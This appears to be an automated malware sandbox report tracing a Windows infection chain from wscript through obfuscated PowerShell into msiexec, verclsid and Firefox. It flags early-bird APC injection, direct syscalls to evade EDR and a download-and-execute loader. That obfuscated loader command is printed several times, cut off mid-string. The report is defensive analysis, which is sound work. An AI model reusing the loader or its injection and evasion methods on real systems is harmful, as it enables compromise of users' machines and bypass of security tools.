Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24422349 mov eax, dword ptr fs:[00000030h]	10_2_24422349
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446A352 mov eax, dword ptr fs:[00000030h]	10_2_2446A352
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CF32A mov eax, dword ptr fs:[00000030h]	10_2_243CF32A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2445F367 mov eax, dword ptr fs:[00000030h]	10_2_2445F367
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439C310 mov ecx, dword ptr fs:[00000030h]	10_2_2439C310
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243C0310 mov ecx, dword ptr fs:[00000030h]	10_2_243C0310
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DA30B mov eax, dword ptr fs:[00000030h]	10_2_243DA30B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DA30B mov eax, dword ptr fs:[00000030h]	10_2_243DA30B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DA30B mov eax, dword ptr fs:[00000030h]	10_2_243DA30B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2444437C mov eax, dword ptr fs:[00000030h]	10_2_2444437C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2442930B mov eax, dword ptr fs:[00000030h]	10_2_2442930B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2442930B mov eax, dword ptr fs:[00000030h]	10_2_2442930B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2442930B mov eax, dword ptr fs:[00000030h]	10_2_2442930B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A7370 mov eax, dword ptr fs:[00000030h]	10_2_243A7370

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7816.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTR

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtAllocateVirtualMemory: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtAllocateVirtualMemory: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\verclsid.exe

Thread register set: target process: 7800

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2EB0000

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#hjemmebagerier semicontradiction anelser raadgivningsvirksomheds #>;$amtskonger='galopperende';<#lgknoldet squiddle hypozeuxis prkeners #>;$klasselotteriernes=$argand+$host.ui;if ($klasselotteriernes) {$spionkamera++;}function wirepullers($whiniest){$hyperscrupulous=$synchronizable+$whiniest.'length'-$spionkamera; for( $alvearies210=4;$alvearies210 -lt $hyperscrupulous;$alvearies210+=5){$paasyningens++;$fideikommiserne+=$whiniest[$alvearies210];$milanesisk='besprinkles';}$fideikommiserne;}function baggrundsfarve102($effektivere){ . ($schoolgirlism) ($effektivere);}$cedertrs=wirepullers 'unqumpigho ef z,keai hanlmasklflueaquer/ c,n ';$cedertrs+=wirepullers 'simu5saa..inte0pat. odou(pe pwn,uri p.onanded,ratospurwhy ds .de fedenjenktgavm fold1dig 0buen.f.cu0 fly;urra parawbe iii fones.e6fris4hver;zyg vidux unn6mult4svul;iiis cnidrpretvyode:f.mi1unsc3h,an1duff.stup0stjd) geo str.gankeet,enc stoktideoring/ sk 2 nat0svi.1prop0rub,0hypa1 ku 0back1sla oplafforuisterrpateeknu,felisodemoxfr m/endu1nuth3ucsu1comp.ek p0 el, ';$pladevenderne=wirepullers 'imm ugenls mice hesrb,ma-ndtracitrgusure ko nparatu,pr ';$dekagrammet=wirepullers 'unphh efttr,fetthorp plsvari: kon/spli/canupbaleromslohelimca aeinstnfinatbaadeceylrkrum. r irtimeskvar/ maad disi fgapnoyaohus dpar,ibetadb li.skvhpaflnfp.anmbelo ';$forslagenes37=wirepullers ' ste>se p ';$schoolgirlism=wirepullers ' chiibukoeprutx.riz ';$almengr='bredendes';$effektfuldes146='\stderes.ide';baggrundsfarve102 (wirepullers ' nsa$fromg ny lb.flo,arrbg stainfelteks: amachopehmun aphysi onrgentlsveji krofbl ktproc=regi$pr,deprotnra gv udk: shaastatp ecapmav d s.gafrokt k iasubt+per,$kardeliddfuns fdiffelng.kbosttuncofsl kuskydlbou.dt anenondsnoto1felt4m re6sera ');baggrundsfarve102 (wirepullers ' shi$butlgvestlsupeoverdbursta prelboom:blgecvivao hexw,ageatrylgoutbecomp=su v$grild pr evenekfjenacruigsig,rzygoah.anmpopumuntee u mtt,ls.frems antpastrlsortiunvotsyrm(byge$statfkvivo metrun.wszelolboylahallg sales senw beetjekschae3conf7temp)sovs ');baggrundsfarve102 (wirepullers 'blnd[mononkommedy.atine .ledes noreuncorskndv poticurrcforgepseupcytooaflbispannsp,ntb abmingeaunben pokanakegstile aurrsmok]infi:plec:equistande.ngecv,diucylir chaiapplttilsyaminp urkrstiko vertdeltodemic,olyoallilfrie k or=lill thu[ endn a.ce mu tsing.spi,s,frie ya clseguforsr w ni racthalvy synphhv rfudgoburrtlandoi tecsch,ohydrl,peet g nyhercptricedo,a]d ne:van :aflytmr,el fnisatte1 ,er2unde ');$dekagrammet=$cowage[0];$metrernes=(wirepullers ' ned$va.dgdr mlp ago agsb dadakinolob i: kraewhipdd ruiaid tbullepokerhe,vef,iss oxe= geon deleunplw c m-nyopoun.xb opsjnon euncocspant kuf h ems indyspilsstiftsokkeronnm skl.vi in,hooego dt sej.forhw pekereawbr vicphallsev,igruselew nmonstfour ');baggrundsfarve102 ($metrernes);baggrundsfarve102 (wirepullers 'damm$volteparadgsteiskintduraepinwrha re orcsaars. de.hm,dveman adi
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#hjemmebagerier semicontradiction anelser raadgivningsvirksomheds #>;$amtskonger='galopperende';<#lgknoldet squiddle hypozeuxis prkeners #>;$klasselotteriernes=$argand+$host.ui;if ($klasselotteriernes) {$spionkamera++;}function wirepullers($whiniest){$hyperscrupulous=$synchronizable+$whiniest.'length'-$spionkamera; for( $alvearies210=4;$alvearies210 -lt $hyperscrupulous;$alvearies210+=5){$paasyningens++;$fideikommiserne+=$whiniest[$alvearies210];$milanesisk='besprinkles';}$fideikommiserne;}function baggrundsfarve102($effektivere){ . ($schoolgirlism) ($effektivere);}$cedertrs=wirepullers 'unqumpigho ef z,keai hanlmasklflueaquer/ c,n ';$cedertrs+=wirepullers 'simu5saa..inte0pat. odou(pe pwn,uri p.onanded,ratospurwhy ds .de fedenjenktgavm fold1dig 0buen.f.cu0 fly;urra parawbe iii fones.e6fris4hver;zyg vidux unn6mult4svul;iiis cnidrpretvyode:f.mi1unsc3h,an1duff.stup0stjd) geo str.gankeet,enc stoktideoring/ sk 2 nat0svi.1prop0rub,0hypa1 ku 0back1sla oplafforuisterrpateeknu,felisodemoxfr m/endu1nuth3ucsu1comp.ek p0 el, ';$pladevenderne=wirepullers 'imm ugenls mice hesrb,ma-ndtracitrgusure ko nparatu,pr ';$dekagrammet=wirepullers 'unphh efttr,fetthorp plsvari: kon/spli/canupbaleromslohelimca aeinstnfinatbaadeceylrkrum. r irtimeskvar/ maad disi fgapnoyaohus dpar,ibetadb li.skvhpaflnfp.anmbelo ';$forslagenes37=wirepullers ' ste>se p ';$schoolgirlism=wirepullers ' chiibukoeprutx.riz ';$almengr='bredendes';$effektfuldes146='\stderes.ide';baggrundsfarve102 (wirepullers ' nsa$fromg ny lb.flo,arrbg stainfelteks: amachopehmun aphysi onrgentlsveji krofbl ktproc=regi$pr,deprotnra gv udk: shaastatp ecapmav d s.gafrokt k iasubt+per,$kardeliddfuns fdiffelng.kbosttuncofsl kuskydlbou.dt anenondsnoto1felt4m re6sera ');baggrundsfarve102 (wirepullers ' shi$butlgvestlsupeoverdbursta prelboom:blgecvivao hexw,ageatrylgoutbecomp=su v$grild pr evenekfjenacruigsig,rzygoah.anmpopumuntee u mtt,ls.frems antpastrlsortiunvotsyrm(byge$statfkvivo metrun.wszelolboylahallg sales senw beetjekschae3conf7temp)sovs ');baggrundsfarve102 (wirepullers 'blnd[mononkommedy.atine .ledes noreuncorskndv poticurrcforgepseupcytooaflbispannsp,ntb abmingeaunben pokanakegstile aurrsmok]infi:plec:equistande.ngecv,diucylir chaiapplttilsyaminp urkrstiko vertdeltodemic,olyoallilfrie k or=lill thu[ endn a.ce mu tsing.spi,s,frie ya clseguforsr w ni racthalvy synphhv rfudgoburrtlandoi tecsch,ohydrl,peet g nyhercptricedo,a]d ne:van :aflytmr,el fnisatte1 ,er2unde ');$dekagrammet=$cowage[0];$metrernes=(wirepullers ' ned$va.dgdr mlp ago agsb dadakinolob i: kraewhipdd ruiaid tbullepokerhe,vef,iss oxe= geon deleunplw c m-nyopoun.xb opsjnon euncocspant kuf h ems indyspilsstiftsokkeronnm skl.vi in,hooego dt sej.forhw pekereawbr vicphallsev,igruselew nmonstfour ');baggrundsfarve102 ($metrernes);baggrundsfarve102 (wirepullers 'damm$volteparadgsteiskintduraepinwrha re orcsaars. de.hm,dveman adi
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#hjemmebagerier semicontradiction anelser raadgivningsvirksomheds #>;$amtskonger='galopperende';<#lgknoldet squiddle hypozeuxis prkeners #>;$klasselotteriernes=$argand+$host.ui;if ($klasselotteriernes) {$spionkamera++;}function wirepullers($whiniest){$hyperscrupulous=$synchronizable+$whiniest.'length'-$spionkamera; for( $alvearies210=4;$alvearies210 -lt $hyperscrupulous;$alvearies210+=5){$paasyningens++;$fideikommiserne+=$whiniest[$alvearies210];$milanesisk='besprinkles';}$fideikommiserne;}function baggrundsfarve102($effektivere){ . ($schoolgirlism) ($effektivere);}$cedertrs=wirepullers 'unqumpigho ef z,keai hanlmasklflueaquer/ c,n ';$cedertrs+=wirepullers 'simu5saa..inte0pat. odou(pe pwn,uri p.onanded,ratospurwhy ds .de fedenjenktgavm fold1dig 0buen.f.cu0 fly;urra parawbe iii fones.e6fris4hver;zyg vidux unn6mult4svul;iiis cnidrpretvyode:f.mi1unsc3h,an1duff.stup0stjd) geo str.gankeet,enc stoktideoring/ sk 2 nat0svi.1prop0rub,0hypa1 ku 0back1sla oplafforuisterrpateeknu,felisodemoxfr m/endu1nuth3ucsu1comp.ek p0 el, ';$pladevenderne=wirepullers 'imm ugenls mice hesrb,ma-ndtracitrgusure ko nparatu,pr ';$dekagrammet=wirepullers 'unphh efttr,fetthorp plsvari: kon/spli/canupbaleromslohelimca aeinstnfinatbaadeceylrkrum. r irtimeskvar/ maad disi fgapnoyaohus dpar,ibetadb li.skvhpaflnfp.anmbelo ';$forslagenes37=wirepullers ' ste>se p ';$schoolgirlism=wirepullers ' chiibukoeprutx.riz ';$almengr='bredendes';$effektfuldes146='\stderes.ide';baggrundsfarve102 (wirepullers ' nsa$fromg ny lb.flo,arrbg stainfelteks: amachopehmun aphysi onrgentlsveji krofbl ktproc=regi$pr,deprotnra gv udk: shaastatp ecapmav d s.gafrokt k iasubt+per,$kardeliddfuns fdiffelng.kbosttuncofsl kuskydlbou.dt anenondsnoto1felt4m re6sera ');baggrundsfarve102 (wirepullers ' shi$butlgvestlsupeoverdbursta prelboom:blgecvivao hexw,ageatrylgoutbecomp=su v$grild pr evenekfjenacruigsig,rzygoah.anmpopumuntee u mtt,ls.frems antpastrlsortiunvotsyrm(byge$statfkvivo metrun.wszelolboylahallg sales senw beetjekschae3conf7temp)sovs ');baggrundsfarve102 (wirepullers 'blnd[mononkommedy.atine .ledes noreuncorskndv poticurrcforgepseupcytooaflbispannsp,ntb abmingeaunben pokanakegstile aurrsmok]infi:plec:equistande.ngecv,diucylir chaiapplttilsyaminp urkrstiko vertdeltodemic,olyoallilfrie k or=lill thu[ endn a.ce mu tsing.spi,s,frie ya clseguforsr w ni racthalvy synphhv rfudgoburrtlandoi tecsch,ohydrl,peet g nyhercptricedo,a]d ne:van :aflytmr,el fnisatte1 ,er2unde ');$dekagrammet=$cowage[0];$metrernes=(wirepullers ' ned$va.dgdr mlp ago agsb dadakinolob i: kraewhipdd ruiaid tbullepokerhe,vef,iss oxe= geon deleunplw c m-nyopoun.xb opsjnon euncocspant kuf h ems indyspilsstiftsokkeronnm skl.vi in,hooego dt sej.forhw pekereawbr vicphallsev,igruselew nmonstfour ');baggrundsfarve102 ($metrernes);baggrundsfarve102 (wirepullers 'damm$volteparadgsteiskintduraepinwrha re orcsaars. de.hm,dveman adi	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
